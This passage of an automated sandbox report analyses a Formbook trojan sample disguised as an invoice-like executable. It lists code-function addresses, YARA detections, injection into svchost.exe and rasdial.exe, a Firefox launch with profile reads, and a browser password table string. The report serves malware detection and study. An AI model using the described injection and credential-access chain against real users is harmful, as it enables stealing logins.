            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E12ED1_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385D2F01_2_0385D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384B1B01_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387516C1_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382F1721_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390B16B1_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EF0CC1_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038470C01_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F70E91_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF0E01_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF7B01_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F16CC1_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038856301_2_03885630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DD5B01_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039095C31_2_039095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F75711_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF43F1_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038314601_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FB801_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B5BF01_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387DBF91_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFB761_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DDAAC1_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03885AA01_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E1AA31_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EDAC61_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFA491_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7A461_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B3A6C1_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D59101_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038499501_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B9501_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038438E01_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AD8001_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03841F921_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFFB11_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD21_2_03803FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD51_2_03803FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFF091_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03849EB01_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FDC01_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03843D401_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F1D5A1_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7D731_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFCF21_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B9C321_2_038B9C32
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02ABA2F65_2_02ABA2F6
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB526E5_2_02AB526E
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB52765_2_02AB5276
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02ABBB365_2_02ABBB36
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02ABD9565_2_02ABD956
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB54965_2_02AB5496
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AD3D365_2_02AD3D36
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB35165_2_02AB3516
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F92AA65_2_02F92AA6
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F948BE5_2_02F948BE
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8C1E65_2_02F8C1E6
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8C1DE5_2_02F8C1DE
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02FAACA65_2_02FAACA6
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8A4865_2_02F8A486
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8C4065_2_02F8C406
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AEE4F6
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AE4420
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF2446
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04B00591
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A40535
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A5C6E0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A3C7C0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A40770
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A64750
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AD2000
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF41A2
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04B001AA
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF81CC
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A30100
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04ADA118
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AC8158
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AC02C0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AE0274
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A4E3F0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04B003E6
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFA352
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AE0CB5
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A30CF2
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A40C00
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A58DBF
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A3ADE0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A4AD00
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04ADCD1F
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A52E90
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFCE93
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFEEDB
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFEE26
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A40E59
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04ABEFA0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A32FC8
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A82F28
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A60F30
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AE2F30
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AB4F40
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A268B8
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A6E8F0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A4A840
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A42840
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A429A0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04B0A9A6
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A56962
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A3EA80
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF6BD7
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFAB40
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFF43F
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A31460
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04ADD5B0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04B095C3
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF7571
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF16CC
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A85630
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFF7B0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF70E9
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFF0E0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AEF0CC
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A470C0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A4B1B0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A7516C
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A2F172
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04B0B16B
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A452A0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AE12ED
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A5D2F0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A5B2C0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A8739A
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF132D
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A2D34C
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFFCF2
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AB9C32
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A5FDC0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF7D73
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A43D40
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF1D5A
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A49EB0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFFFB1
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A41F92
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A03FD2
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A03FD5
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFFF09
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A438E0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AAD800
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AD5910
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A49950
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A5B950
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04ADDAAC
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A85AA0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AE1AA3
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AEDAC6
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AB3A6C
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFFA49
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AF7A46
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A5FB80
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AB5BF0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04A7DBF9
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04AFFB76
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A11BF0
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A0CB68
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A0CB70
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A0AE10
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A0CD90
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A15250
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A2B630
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02A13430
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_047DD778
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_047DE70C
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_047DE258
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_047DE373
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03887E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0382B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 038BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03875130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04A75130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04A2B970 appears 262 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04A87E54 appears 107 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04ABF290 appears 103 times
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: String function: 00E10D27 appears 70 times
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: String function: 00DF7F41 appears 35 times
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: String function: 00E18B40 appears 42 times
            Source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1683065590.0000000004083000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 20-EM-00- PI-INQ-3001.exe
            Source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1684340650.000000000427D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 20-EM-00- PI-INQ-3001.exe
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@11/10
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E5A2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E48713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E48CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E5B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E6F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00E4DA5D CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Code function: 0_2_00DF4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe File created: C:\Users\user\AppData\Local\Temp\autCAB9.tmp
            Source: 20-EM-00- PI-INQ-3001.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: rasdial.exe, 00000006.00000003.2172046065.0000000002C92000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2171949568.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 20-EM-00- PI-INQ-3001.exe ReversingLabs: Detection: 29%
            Source: 20-EM-00- PI-INQ-3001.exe Virustotal: Detection: 28%
            Source: unknown Process created: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: scrrun.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe Section loaded: sxs.dll
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasman.dll
